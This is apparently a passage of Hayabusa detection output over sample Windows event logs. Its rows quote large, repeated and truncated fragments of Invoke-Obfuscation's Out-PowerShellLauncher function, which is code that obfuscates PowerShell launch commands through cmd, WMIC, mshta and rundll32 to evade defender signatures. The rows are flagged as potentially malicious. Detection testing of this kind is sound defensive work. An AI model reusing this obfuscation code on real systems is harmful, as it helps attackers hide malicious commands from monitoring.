For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. 
$PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. 
If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). 
If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. 
$PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. 
# This is to pr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. 
$System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. 
$PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. 
If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. 
For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. 
$CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. 
$System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. 
$PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input 